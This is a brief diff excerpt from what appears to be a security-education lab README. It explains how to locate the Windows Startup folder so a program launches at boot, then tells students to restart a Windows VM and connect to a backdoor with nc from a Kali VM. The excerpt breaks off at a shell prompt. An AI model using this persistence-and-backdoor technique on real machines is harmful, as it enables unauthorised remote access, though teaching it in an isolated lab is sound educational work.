xinwenfu/GenCyber/SoftwareSecurity/README.md

 ```
 Please pay attention to how the long folder name with multiple words is quoted.

+To find where the startup folder is, press the Windows logo key  + R, type shell:startup, then select OK.
+This opens the Startup folder so that you can see where it is.

 3. Restart Windows VM, use *nc* at Kali VM log into the backdoor
 ```
 ┌──(kali㉿Cyber-Range)-[~]